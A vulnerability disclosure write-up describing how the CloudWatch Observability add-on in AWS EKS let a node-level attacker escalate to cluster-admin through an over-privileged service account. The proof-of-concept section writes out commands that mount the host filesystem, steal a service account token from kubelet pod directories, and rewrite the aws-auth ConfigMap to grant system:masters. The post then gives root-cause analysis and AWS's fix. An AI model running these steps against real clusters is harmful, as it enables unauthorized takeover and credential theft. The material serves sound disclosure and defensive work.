Introduction

At the start of 2026, Reversec identified a privilege escalation vulnerability in the CloudWatch Observability Add-on in AWS’s Elastic Kubernetes Service (EKS). This issue provided a way for an attacker to modify the aws-auth ConfigMap in a cluster with the ConfigMap authentication mode enabled. The root cause was an over-privileged service account in a DaemonSet deployed by this add-on, which allowed any attacker who had gained access to a node in the cluster to escalate to cluster-admin.

This issue was present in the ‘out-of-the-box’ default configuration of the observability add-on; that is, it did not require any misconfiguration by the cluster administrators to be exploitable. It was therefore likely to be commonplace in EKS clusters: Reversec found this vulnerability in two different client environments during two separate engagements in January 2026.

Background

Before walking through the vulnerability itself, let’s quickly cover the relevant components involved.

Amazon CloudWatch Observability Add-on

To quote from the EKS documentation, “Amazon EKS add-ons provide installation and management of a curated set of add-ons for Amazon EKS clusters”. Essentially, these are features that a user can add to their cluster that are managed by the EKS service and provide extra capabilities. Some of these integrate closely with other AWS services, as is the case with the Amazon CloudWatch Observability add-on, which collects metrics from the cluster and delivers them to CloudWatch.

As this is available as an EKS add-on, the installation process is very simple. Observability options are presented to the user during cluster creation in the AWS console, including enabling the CloudWatch agent. Alternatively, it can be added to an existing cluster by navigating to the Add-Ons tab in the console or by running the aws eks create-addon command with the AWS CLI. The only additional configuration needed is to provide an IAM role with the CloudWatchAgentServerPolicy attached to enable the agent to interact with CloudWatch.

EKS Authentication Modes

Currently, EKS has two authentication modes available: “EKS API and ConfigMap” or “EKS API only”.

The EKS API authentication mode uses “access entries” to provide access to the Kubernetes cluster. An EKS access entry associates a set of Kubernetes permissions with an IAM identity; a developer can then assume that IAM identity and use that to authenticate to their EKS Cluster. This authentication mode is currently the option recommended by AWS. It does provide certain advantages, such as centralizing authentication and authorization management and thereby eliminating the need to switch between AWS and Kubernetes APIs to update user permissions.

The ConfigMap mode was the original authentication method for EKS. This mode adds the aws-auth ConfigMap to the kube-system namespace within the cluster, which associates an AWS IAM identity with a Kubernetes RBAC identity. The cluster administrator can configure a role or cluster role bound to that RBAC identity to provide permissions to the cluster resources, or use a pre-defined group such as system:masters. When authenticating to the Kubernetes API server as the AWS IAM identity, authorization is provided based on the role or cluster role associated with the matching group in the aws-auth ConfigMap.
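
The mapping described above can be sketched in a few lines of Python. This is a simplified model for illustration only, not the aws-iam-authenticator implementation; the ARN is a placeholder and the function name resolve_identity is an assumption.

```python
# Simplified, hypothetical model of how an aws-auth mapRoles entry turns an
# IAM role ARN into a Kubernetes username and groups.
MAP_ROLES = [
    {
        "rolearn": "arn:aws:iam::111122223333:role/ExampleAppRole",  # placeholder ARN
        "username": "app-user",
        "groups": ["app-users"],
    },
]


def resolve_identity(map_roles, role_arn):
    """Return (username, groups) for the first entry matching role_arn, else None."""
    for entry in map_roles:
        if entry["rolearn"] == role_arn:
            return entry["username"], list(entry.get("groups", []))
    return None


if __name__ == "__main__":
    print(resolve_identity(MAP_ROLES, "arn:aws:iam::111122223333:role/ExampleAppRole"))
```

Kubernetes RBAC then decides what the returned groups may do, which is why adding a group such as system:masters to an entry is so powerful.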

At the time of writing, AWS has deprecated the ConfigMap authentication mode and recommends using the EKS API method. However, there are a number of reasons why the ConfigMap mode may still be enabled, primarily in existing clusters that have not yet been migrated to use access entries. Furthermore, the EKS API mode has a preset list of access entries that provide the Kubernetes RBAC permissions to an IAM identity. If a cluster administrator wishes to apply more granular, custom access they must use the ConfigMap mode, which allows them to fully control the Kubernetes RBAC role permissions.

If using the “EKS API and ConfigMap” authentication mode and an IAM identity has an access entry assigned to it, that access takes precedence over any added to the aws-auth ConfigMap. For example, if an IAM role is granted read-only permissions for a specific namespace via an access entry and also granted cluster-admin permissions via the aws-auth ConfigMap, the role will only have read-only access to the specified namespace.
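
As a rough sketch of that precedence rule, assuming each source is modeled as a simple dictionary keyed by role ARN (the function name, data shapes and ARN are illustrative, not an AWS API):

```python
def effective_access(role_arn, access_entries, aws_auth):
    """Return the access that applies to role_arn under the precedence above.

    An access entry, when present, wins outright; the aws-auth mapping is
    only consulted when no access entry exists for the identity.
    """
    if role_arn in access_entries:
        return access_entries[role_arn]
    return aws_auth.get(role_arn)


if __name__ == "__main__":
    role = "arn:aws:iam::111122223333:role/ExampleRole"  # placeholder ARN
    entries = {role: "read-only in one namespace"}
    configmap = {role: "cluster-admin"}
    print(effective_access(role, entries, configmap))
```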

Pod Separation

When performing a security review of a Kubernetes cluster, EKS or any other flavor, one of the recommendations that can help improve the security posture is to enforce pod separation. That is, it is good practice to use a feature such as Kubernetes Taints and Tolerations to ensure pods of different sensitivity levels are scheduled onto separate nodes. The aim is to limit the impact an attacker could have on a cluster in the event they compromise a pod and manage to escape the container to access the underlying node. For example, if an externally facing pod is compromised, perhaps a pod providing a micro-service to an application, then that pod is unlikely to have significant permissions to interact with other cluster resources. However, if the attacker was able to pivot to another pod on the same node that was running a cluster management service, they may be able to use that pod’s permissions to gain further control of the cluster.

One scenario in which pod separation is difficult to enforce is when a cluster has a monitoring service running. By their nature, such services need to deploy a pod to every node (usually achieved with a DaemonSet) in order to collect metrics for all cluster resources. These pods may also need more elevated privileges than a typical pod in order to perform their legitimate operation. This can lead to privilege escalation scenarios such as the one identified in the CloudWatch Observability Add-on.
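
To make the taint and toleration mechanics concrete, here is a minimal Python sketch of the matching rules. It is a simplified model rather than the scheduler's code, and the taint key and value ("workload", "management") are hypothetical.

```python
def tolerates(toleration, taint):
    """Simplified toleration match: effect, then key, then operator/value."""
    effect = toleration.get("effect", "")
    if effect and effect != taint["effect"]:
        return False
    key = toleration.get("key", "")
    if key and key != taint["key"]:
        return False
    operator = toleration.get("operator", "Equal")
    if operator == "Exists":
        return True
    if operator == "Equal":
        return toleration.get("value", "") == taint.get("value", "")
    return False


def can_schedule(pod_tolerations, node_taints):
    """A pod fits only if every NoSchedule/NoExecute taint is tolerated."""
    blocking = [t for t in node_taints if t["effect"] in ("NoSchedule", "NoExecute")]
    return all(any(tolerates(tol, taint) for tol in pod_tolerations) for taint in blocking)


# Hypothetical taint placed on a node reserved for management workloads.
MANAGEMENT_TAINT = {"key": "workload", "value": "management", "effect": "NoSchedule"}

if __name__ == "__main__":
    print(can_schedule([], [MANAGEMENT_TAINT]))                        # ordinary app pod
    print(can_schedule([{"operator": "Exists"}], [MANAGEMENT_TAINT]))  # tolerate-everything pod
```

A pod that tolerates every taint, as in the second call, lands on all nodes regardless of how carefully they were separated, which is the situation a node-wide monitoring agent creates. Taints only repel pods; pinning a sensitive workload to a particular node also needs a node selector or affinity rule.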

Privilege Escalation Path

To illustrate this privilege escalation path, Reversec deployed a basic EKS cluster using the “EKS API and ConfigMap” authentication mode and enabled the CloudWatch Observability Add-on. This test cluster was deployed following the AWS documentation, and no alterations were made to the add-on; it was deployed in its default state. The latest versions of Kubernetes and the add-on available at the time of testing were used for the cluster (v1.35 and v4.10.1-eksbuild.1 respectively).

With this add-on enabled, EKS created a new namespace (amazon-cloudwatch) and within that deployed a management pod (amazon-cloudwatch-observability-controller-manager) and two DaemonSets: cloudwatch-agent and fluent-bit. The management deployment had a service account with a highly privileged cluster role, giving it permission to modify many resources at the cluster level. Both DaemonSets shared the same service account, cloudwatch-agent. While this service account was mostly limited to cluster-wide read-only permissions, Reversec identified at least two permissions that could be used to compromise the entire cluster.

The first of these was the permission to update ConfigMaps at the cluster level; this could be used to modify the aws-auth ConfigMap and grant cluster-admin rights to the attacker. The second was the get permission on the nodes/proxy resource; a recently published article (2026-01-26) explains how this permission can be used to gain code execution on all pods in a cluster. Reversec’s research in this article focuses on the former issue relating to the ConfigMap permission; details on the nodes/proxy vulnerability can be found in Graham Helton’s blog post.
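
A small Python sketch shows how these two permissions could be picked out of a set of RBAC rules. The rule list is a hypothetical excerpt: only the update ConfigMaps and get nodes/proxy permissions come from the findings above, and the matching logic is a simplification of RBAC evaluation.

```python
def rule_allows(rule, verb, resource, api_group=""):
    """Simplified RBAC match: exact value or "*" wildcard in each field."""
    def match(values, wanted):
        return "*" in values or wanted in values

    return (
        match(rule.get("apiGroups", []), api_group)
        and match(rule.get("resources", []), resource)
        and match(rule.get("verbs", []), verb)
    )


# Hypothetical excerpt of a cluster role; not the add-on's real manifest.
CLUSTER_ROLE_RULES = [
    {"apiGroups": [""], "resources": ["pods", "nodes", "endpoints"], "verbs": ["get", "list", "watch"]},
    {"apiGroups": [""], "resources": ["nodes/proxy"], "verbs": ["get"]},
    {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get", "update"]},
]

# (verb, resource) pairs discussed in this article as escalation primitives.
RISKY = [("update", "configmaps"), ("get", "nodes/proxy")]


def risky_permissions(rules):
    """Return the risky (verb, resource) pairs granted by any rule."""
    return [(v, r) for v, r in RISKY if any(rule_allows(rule, v, r) for rule in rules)]


if __name__ == "__main__":
    print(risky_permissions(CLUSTER_ROLE_RULES))
```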

As a starting point for a proof-of-concept, Reversec deployed the following resources to the cluster. This created a role with full permissions for the pods and pods/exec resources, and for deployments, in the application namespace only. The role was bound to a group, which in turn was added to the aws-auth ConfigMap to assign these permissions to an IAM role.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: app-user-role
  namespace: app-namespace
rules:
- apiGroups: [""]
  resources: ["pods", "pods/exec"]
  verbs: ["*"]
- apiGroups: ["apps"]
  resources: ["deployments"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: app-user-binding
  namespace: app-namespace
subjects:
- kind: Group
  name: app-users
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: app-user-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole
      groups:
      - system:bootstrappers
      - system:nodes
      username: system:node:{{EC2PrivateDNSName}}
    - rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole
      groups:
      - app-users
      username: app-user

Assuming the eksCloudWatchAddonPrivEscAppRole role, Reversec verified their identity within the Kubernetes cluster and demonstrated the limited access:

kubectl auth whoami
ATTRIBUTE                                              VALUE
Username                                               app-user
UID                                                    aws-iam-authenticator:519197412674:AROAXRYUTZVBOUKMAI7NC
Groups                                                 [app-users system:authenticated]
Extra: accessKeyId                                     [ASIAXRYUTZVBC6GMF4E5]
Extra: arn                                             [arn:aws:sts::519197412674:assumed-role/eksCloudWatchAddonPrivEscAppRole/kube-app-user]
Extra: canonicalArn                                    [arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole]
Extra: principalId                                     [AROAXRYUTZVBOUKMAI7NC]
Extra: sessionName                                     [kube-app-user]
Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AROAXRYUTZVBOUKMAI7NC]


kubectl -n kube-system get configmaps aws-auth
Error from server (Forbidden): configmaps "aws-auth" is forbidden: User "app-user" cannot get resource "configmaps" in API group "" in the namespace "kube-system"

kubectl get pods -A
Error from server (Forbidden): pods is forbidden: User "app-user" cannot list resource "pods" in API group "" at the cluster scope

Next, Reversec deployed a privileged pod to the application namespace to which this user had access. The pod was configured to mount the host filesystem and would therefore be able to access details of other pods running on the same node, including service account tokens. Once deployed, Reversec executed into the pod and extracted the token for the cloudwatch-agent service account from one of the DaemonSets deployed by the observability add-on.

kubectl -n app-namespace exec priv-app-9c9ddbf8-t87xk -it -- /bin/bash

root@priv-app-9c9ddbf8-t87xk:/# cd /hostfs/var/lib/kubelet/pods

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods# find . -name "*otc*"
./3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~configmap/otc-internal
./3da430d3-b605-4109-b3b5-37ee40503cf9/plugins/kubernetes.io~empty-dir/wrapped_otc-internal
./3da430d3-b605-4109-b3b5-37ee40503cf9/containers/otc-container

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods# cd 3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq/

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods/3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq# ls
ca.crt  namespace  token

root@priv-app-9c9ddbf8-t87xk:/hostfs/var/lib/kubelet/pods/3da430d3-b605-4109-b3b5-37ee40503cf9/volumes/kubernetes.io~projected/kube-api-access-6w4nq# cat token
eyJhbGci...
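
A service account token is a JWT, so its claims can be inspected offline to confirm which identity it belongs to. The Python sketch below decodes the payload without verifying the signature; the helper make_unsigned_token exists only to build a dummy token for the demonstration and is not part of any Kubernetes tooling.

```python
import base64
import json


def decode_jwt_payload(token):
    """Return the claims of a JWT as a dict. The signature is NOT verified."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    payload = parts[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def make_unsigned_token(claims):
    """Build a dummy token for demonstration; the signature part is a placeholder."""
    def b64(obj):
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

    return ".".join([b64({"alg": "none"}), b64(claims), "sig"])


if __name__ == "__main__":
    demo = make_unsigned_token(
        {"sub": "system:serviceaccount:amazon-cloudwatch:cloudwatch-agent"}
    )
    print(decode_jwt_payload(demo)["sub"])
```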

With the cloudwatch-agent service account token, it was now possible to update the aws-auth ConfigMap. Running kubectl edit opened the ConfigMap in an editor, but saving the changes failed because the service account lacked the ‘patch’ permission, which kubectl edit uses to submit changes to a resource. However, kubectl saved a copy of the edited manifest locally. Submitting that file with kubectl replace, which relies on the ‘update’ permission instead, successfully modified the resource. Reversec used this approach to add the current user to the system:masters group, granting this user cluster-admin privileges, as illustrated below:

kubectl --token=$TOKEN auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:amazon-cloudwatch:cloudwatch-agent
UID                                                 03eb0898-9bf0-484f-a659-458a823bdc5f
Groups                                              [system:serviceaccounts system:serviceaccounts:amazon-cloudwatch system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=6e9c4655-ce37-4744-a5e3-e7b8f9d6682a]
Extra: authentication.kubernetes.io/node-name       [ip-192-168-222-204.ec2.internal]
Extra: authentication.kubernetes.io/node-uid        [3504d4a1-5a42-4c7c-8fe7-f6411ca16a77]
Extra: authentication.kubernetes.io/pod-name        [cloudwatch-agent-prnf4]
Extra: authentication.kubernetes.io/pod-uid         [3da430d3-b605-4109-b3b5-37ee40503cf9]

kubectl --token=$TOKEN -n kube-system get configmap aws-auth
NAME       DATA   AGE
aws-auth   1      55m

kubectl --token=$TOKEN -n kube-system edit configmap aws-auth
error: configmaps "aws-auth" could not be patched: configmaps "aws-auth" is forbidden: User "system:serviceaccount:amazon-cloudwatch:cloudwatch-agent" cannot patch resource "configmaps" in API group "" in the namespace "kube-system"
You can run `kubectl replace -f /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-3640773212.yaml` to try this update again.

cat /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-376693018.yaml
# Please edit the object below. Lines beginning with a '#' will be ignored,
# and an empty file will abort the edit. If an error occurs while saving this file will be
# reopened with the relevant failures.
#
apiVersion: v1
data:
  mapRoles: |
    - rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole
      groups:
      - system:bootstrappers
      - system:nodes
      username: system:node:{{EC2PrivateDNSName}}
    - rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole
      groups:
      - app-users
      - system:masters
      username: app-user
kind: ConfigMap
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","data":{"mapRoles":"- rolearn: arn:aws:iam::519197412674:role/cloudWatchAddonPrivEscEKSNodeRole\n  groups:\n  - system:bootstrappers\n  - system:nodes\n  username: system:node:{{EC2PrivateDNSName}}\n- rolearn: arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole\n  groups:\n  - app-users\n  username: app-user\n"},"kind":"ConfigMap","metadata":{"annotations":{},"name":"aws-auth","namespace":"kube-system"}}
  creationTimestamp: "2026-02-16T16:48:09Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "273872"
  uid: 477ff0ae-7c83-446b-b7d9-d061fa64033f

kubectl --token=$TOKEN replace -f /var/folders/z0/9mxlgc0n24dbvm7yqgj_qf500000gp/T/kubectl-edit-376693018.yaml
configmap/aws-auth replaced
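
The difference between the failed and successful commands comes down to which RBAC verb each one needs. A minimal Python sketch of that relationship follows; the mapping covers only the commands relevant here, and the granted verbs are those observed for ConfigMaps in the transcript above.

```python
# RBAC verb each kubectl subcommand needs in order to write an existing object.
WRITE_VERB = {
    "edit": "patch",      # kubectl edit submits the change as a patch
    "patch": "patch",
    "replace": "update",  # kubectl replace sends the whole object back
}


def usable_commands(granted_verbs):
    """Return the kubectl write commands that the granted verbs permit."""
    granted = set(granted_verbs)
    return sorted(
        cmd for cmd, verb in WRITE_VERB.items() if verb in granted or "*" in granted
    )


if __name__ == "__main__":
    # Verbs the cloudwatch-agent token was seen to hold on ConfigMaps.
    print(usable_commands({"get", "update"}))
```

Withholding the patch verb therefore offers no protection when update is still granted.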

Once updated, Reversec verified the user now had full cluster access:

kubectl auth whoami
ATTRIBUTE                                              VALUE
Username                                               app-user
UID                                                    aws-iam-authenticator:519197412674:AROAXRYUTZVBOUKMAI7NC
Groups                                                 [app-users system:masters system:authenticated]
Extra: accessKeyId                                     [ASIAXRYUTZVBC6GMF4E5]
Extra: arn                                             [arn:aws:sts::519197412674:assumed-role/eksCloudWatchAddonPrivEscAppRole/kube-app-user]
Extra: canonicalArn                                    [arn:aws:iam::519197412674:role/eksCloudWatchAddonPrivEscAppRole]
Extra: principalId                                     [AROAXRYUTZVBOUKMAI7NC]
Extra: sessionName                                     [kube-app-user]
Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AROAXRYUTZVBOUKMAI7NC]

kubectl get pods -A
NAMESPACE           NAME                                                              READY   STATUS    RESTARTS   AGE
amazon-cloudwatch   amazon-cloudwatch-observability-controller-manager-5c5b977gwqxq   1/1     Running   0          25h
amazon-cloudwatch   cloudwatch-agent-82n5z                                            1/1     Running   0          25h
amazon-cloudwatch   cloudwatch-agent-prnf4                                            1/1     Running   0          25h
amazon-cloudwatch   fluent-bit-fqbfz                                                  1/1     Running   0          25h
amazon-cloudwatch   fluent-bit-ftmsn                                                  1/1     Running   0          25h
app-namespace       priv-app-9c9ddbf8-t87xk                                           1/1     Running   0          147m
external-dns        external-dns-66df598888-klcb5                                     1/1     Running   0          25h
kube-system         aws-node-8tw7k                                                    2/2     Running   0          25h
kube-system         aws-node-mtcds                                                    2/2     Running   0          25h
kube-system         coredns-7bc7c74875-6tzmc                                          1/1     Running   0          25h
kube-system         coredns-7bc7c74875-bpgkt                                          1/1     Running   0          25h
kube-system         eks-node-monitoring-agent-7vt56                                   1/1     Running   0          25h
kube-system         eks-node-monitoring-agent-tvcdk                                   1/1     Running   0          25h
kube-system         eks-pod-identity-agent-4l9gf                                      1/1     Running   0          25h
kube-system         eks-pod-identity-agent-wzhrk                                      1/1     Running   0          25h
kube-system         kube-proxy-22zbj                                                  1/1     Running   0          25h
kube-system         kube-proxy-lvdm6                                                  1/1     Running   0          25h
kube-system         metrics-server-7649fff9f-9h6m7                                    1/1     Running   0          25h
kube-system         metrics-server-7649fff9f-blx8x                                    1/1     Running   0          25h

Root Cause Analysis

As demonstrated above, the root cause that allows this privilege escalation is the permission for the cloudwatch-agent service account to update ConfigMaps at the cluster level. While the management deployment service account for the CloudWatch Add-on has far more privileges, this deployment could be segregated to a ‘management’ node to minimize its exposure. However, the cloudwatch-agent and fluent-bit DaemonSets must have a pod on every node to be able to collect metrics for the entire cluster.

Reversec’s first thought was to investigate whether the cloudwatch-agent service account needs this permission at all. Looking at the cluster’s ConfigMaps, there are a number of these resources in the amazon-cloudwatch namespace.

kubectl get configmaps -A
NAMESPACE           NAME                                                   DATA   AGE
amazon-cloudwatch   cloudwatch-agent                                       1      45h
amazon-cloudwatch   cloudwatch-agent-windows                               1      45h
amazon-cloudwatch   cloudwatch-agent-windows-container-insights            1      45h
amazon-cloudwatch   cwagent-clusterleader                                  0      45h
amazon-cloudwatch   dcgm-exporter-config-map                               2      45h
amazon-cloudwatch   fluent-bit-config                                      5      45h
amazon-cloudwatch   fluent-bit-windows-config                              5      45h
amazon-cloudwatch   kube-root-ca.crt                                       1      45h
amazon-cloudwatch   neuron-monitor-config-map                              1      45h
app-namespace       kube-root-ca.crt                                       1      23h
default             kube-root-ca.crt                                       1      45h
external-dns        kube-root-ca.crt                                       1      45h
kube-node-lease     kube-root-ca.crt                                       1      45h
kube-public         kube-root-ca.crt                                       1      45h
kube-system         amazon-vpc-cni                                         7      45h
kube-system         aws-auth                                               1      45h
kube-system         coredns                                                1      45h
kube-system         extension-apiserver-authentication                     6      45h
kube-system         kube-apiserver-legacy-service-account-token-tracking   1      45h
kube-system         kube-proxy                                             1      45h
kube-system         kube-proxy-config                                      1      45h
kube-system         kube-root-ca.crt                                       1      45h

The hypothesis was that the cloudwatch-agent service account may be responsible for updating the cloudwatch-agent ConfigMap. Looking at this ConfigMap, it contained the agent’s configuration:

kubectl -n amazon-cloudwatch get cm cloudwatch-agent -o jsonpath='{.data}' | jq -r '."cwagentconfig.json"' | jq
{
  "agent": {
    "region": "us-east-1"
  },
  "logs": {
    "metrics_collected": {
      "application_signals": {
        "hosted_in": "cloudwatchaddon-privesc-testcluster"
      },
      "kubernetes": {
        "cluster_name": "cloudwatchaddon-privesc-testcluster",
        "enhanced_container_insights": true
      }
    }
  },
  "traces": {
    "traces_collected": {
      "application_signals": {}
    }
  }
}

This configuration could be updated with the following AWS CLI command, updating the enhanced_container_insights value to false:

aws eks update-addon \
  --cluster-name cloudwatchaddon-privesc-testcluster \
  --addon-name amazon-cloudwatch-observability \
  --service-account-role-arn arn:aws:iam::519197412674:role/AmazonEKSPodIdentityAmazonCloudWatchObservabilityRole \
  --configuration-values '{"agent": {"config": {"logs": {"metrics_collected": {"application_signals": {},"kubernetes": {"enhanced_container_insights": false}}},"traces": {"traces_collected": {"application_signals": {}}}}}}'
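
Hand-writing the nested JSON for --configuration-values is error-prone, so one option is to generate it. The Python sketch below builds the same structure as the command above; the function name is an assumption.

```python
import json


def build_configuration_values(enhanced_container_insights):
    """Return the add-on configuration as a JSON string."""
    config = {
        "agent": {
            "config": {
                "logs": {
                    "metrics_collected": {
                        "application_signals": {},
                        "kubernetes": {
                            "enhanced_container_insights": enhanced_container_insights
                        },
                    }
                },
                "traces": {"traces_collected": {"application_signals": {}}},
            }
        }
    }
    return json.dumps(config)


if __name__ == "__main__":
    print(build_configuration_values(False))
```

The printed string is what the aws eks update-addon command above takes as its --configuration-values argument.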

Running this command did update the above ConfigMap. Next, Reversec modified the cluster role for the cloudwatch-agent service account to remove the ‘update’ permission for ConfigMaps. Running the same update command now no longer changed the cloudwatch-agent ConfigMap. Running the following command confirmed the update had failed:

aws eks describe-addon \
  --cluster-name cloudwatchaddon-privesc-testcluster \
  --addon-name amazon-cloudwatch-observability
  
{
    "addon": {
        "addonName": "amazon-cloudwatch-observability",
        "clusterName": "cloudwatchaddon-privesc-testcluster",
        "status": "UPDATE_FAILED",
        "addonVersion": "v4.10.1-eksbuild.1",
        "health": {
            "issues": [
                {
                    "code": "ConfigurationConflict",
                    "message": "Conflicts found when trying to apply. Will not continue due to resolve conflicts mode. Conflicts:\nClusterRole.rbac.authorization.k8s.io cloudwatch-agent-role - .rules"
                }
---

This implied that the cloudwatch-agent is responsible for updating at least one ConfigMap. This posed two further questions:

  1. Why is the role cluster-wide and not restricted to the amazon-cloudwatch namespace?
  2. Why is the agent updating the ConfigMap, rather than the add-on’s management deployment?

For the first question, Reversec attempted to modify the configuration to use a role bound to the namespace rather than a cluster role. The initial approach was to create an exact copy of the existing cluster role with all the same permissions but make this a role in the amazon-cloudwatch namespace. This attempt failed because the cluster role included some non-resource URLs, which cannot be namespaced and can only be assigned at the cluster level. This may explain why the cloudwatch-agent service account was assigned a cluster role in the first place. However, a more secure approach would be to create two sets of permissions: one role bound to the namespace for the majority of permissions, especially write permissions, and one cluster role only for those permissions required at the cluster level.
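
The split suggested above can be sketched in Python. The rules and the set of cluster-scoped resources are hypothetical, and the sketch does not attempt to decide which read permissions the agent needs across all namespaces.

```python
# Resources that exist only at cluster scope (illustrative, not exhaustive).
CLUSTER_SCOPED = frozenset({"nodes", "nodes/proxy", "namespaces"})


def split_rules(rules, cluster_scoped=CLUSTER_SCOPED):
    """Split rules into (namespaced, cluster_only) lists.

    Rules with nonResourceURLs, or touching cluster-scoped resources, must
    stay in a cluster role; everything else can move to a namespaced role.
    """
    namespaced, cluster_only = [], []
    for rule in rules:
        if "nonResourceURLs" in rule:
            cluster_only.append(rule)
        elif any(res in cluster_scoped for res in rule.get("resources", [])):
            cluster_only.append(rule)
        else:
            namespaced.append(rule)
    return namespaced, cluster_only


# Hypothetical rules; not the add-on's real cluster role.
EXAMPLE_RULES = [
    {"nonResourceURLs": ["/metrics"], "verbs": ["get"]},
    {"apiGroups": [""], "resources": ["nodes"], "verbs": ["get", "list"]},
    {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["update"]},
]

if __name__ == "__main__":
    role_rules, cluster_role_rules = split_rules(EXAMPLE_RULES)
    print(role_rules)
    print(cluster_role_rules)
```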

Reversec attempted to implement this in the test cluster by creating a new namespaced role with the update ConfigMaps permission and binding it to the cloudwatch-agent service account. The update ConfigMaps permission was then removed from the existing cluster role. This configuration still failed in the same manner as the previous attempt: updating the add-on failed and returned the same error as above. The error message, “Conflicts found when trying to apply. Will not continue due to resolve conflicts mode. Conflicts:\nClusterRole.rbac.authorization.k8s.io cloudwatch-agent-role - .rules”, implied the issue was related to the cluster role, though what it was conflicting with was unclear. As a final attempt, Reversec deleted the cluster role entirely and kept only the namespaced role with the update ConfigMaps permission. In this scenario, after running the command to update the add-on, EKS re-deployed the missing cluster role before successfully making the update with the restored permissions. Therefore, Reversec was unable to confirm whether a namespaced role would be sufficient, as the managed EKS service would not permit the modifications to the Kubernetes resources needed to test the hypothesis.

The second question is harder to answer without more information about how the add-on works under the hood. This is one of the trade-offs when using a managed service like EKS: deployment and management are easier because some of the workload is taken care of by the service, but this comes at the expense of control over the abstracted components of the service. However, from observations of this add-on and its resources, it would make sense for the management deployment to make modifications to the add-on’s resources, leaving the cloudwatch-agent to perform only metric collection. This way, cluster administrators could apply pod separation and minimize the risk of cluster-wide compromise by keeping the management pod on a separate node from other workloads.

Responsible Disclosure and AWS’ Response

Reversec disclosed this finding to AWS on 23rd February 2026. AWS responded on 9th April, acknowledging the issue and stating that they had updated the permissions to address this vulnerability. Their full response is printed below:

Thank you for your submission regarding the Amazon CloudWatch Observability EKS add-on.  
  
We have reviewed your report and appreciate you bringing this to our attention. The scenario you described requires the ability to deploy privileged pods with host filesystem access, which in Kubernetes environments provides inherent access to service account credentials on the node.  
  
We have updated the agent's permissions and our documentation to provide clearer visibility into the add-on's permissions.  
  
We recommend customers follow EKS security best practices, including using EKS access entries instead of the aws-auth ConfigMap where possible, and implementing Pod Security Standards to restrict privileged workloads [1][2].  
  
Thank you for your contribution to our ongoing security efforts.  
  
[1] https://docs.aws.amazon.com/eks/latest/best-practices/
[2] https://aws.github.io/aws-eks-best-practices/security/docs/pods/

While Reversec could not find any clear documentation about the permissions the agent uses, the permissions for the add-on had been modified. From version v5.3.0-eksbuild.1 onwards, a new role (cloudwatch-agent-role) has been introduced to the add-on and bound to the agent’s service account in the amazon-cloudwatch namespace. This new role contains the update ConfigMaps permission, which has now been removed from the cluster role. This enables the agent to continue to perform its intended operation and update the ConfigMaps within the amazon-cloudwatch namespace, but the agent no longer has the capability to update ConfigMaps cluster-wide and therefore can no longer be used by an adversary to update the aws-auth ConfigMap.
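
The effect of moving the permission from a cluster role to a namespaced role can be modeled in Python as follows. The Grant type and the before/after lists are illustrative and cover only the update ConfigMaps permission discussed here.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Grant:
    verb: str
    resource: str
    namespace: Optional[str]  # None models a cluster-wide grant


def allowed(grants, verb, resource, namespace):
    """True if any grant covers the verb and resource in the given namespace."""
    return any(
        g.verb == verb and g.resource == resource and g.namespace in (None, namespace)
        for g in grants
    )


# Before the fix: update on ConfigMaps granted cluster-wide.
BEFORE = [Grant("update", "configmaps", None)]
# After the fix: the same permission scoped to the add-on's namespace.
AFTER = [Grant("update", "configmaps", "amazon-cloudwatch")]

if __name__ == "__main__":
    for label, grants in (("before", BEFORE), ("after", AFTER)):
        print(label, allowed(grants, "update", "configmaps", "kube-system"))
```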

It is important to note that this change to the permissions does nothing to address the vulnerability exploiting the get nodes/proxy permission. The cloudwatch-agent service account maintains this permission and so an attacker could still use this technique to access management pods on any node and escalate to cluster-admin in an EKS deployment using the Amazon CloudWatch Observability add-on. A potential mitigation proposed in the blog post that disclosed this issue is to restrict traffic on the Kubelet port. However, this could have unforeseen impact on a cluster’s legitimate operation and would require further research to provide an actionable recommendation. While this is a more complicated technique, any EKS cluster that uses this add-on will have an escalation path to cluster-admin from any node.

Recommendations

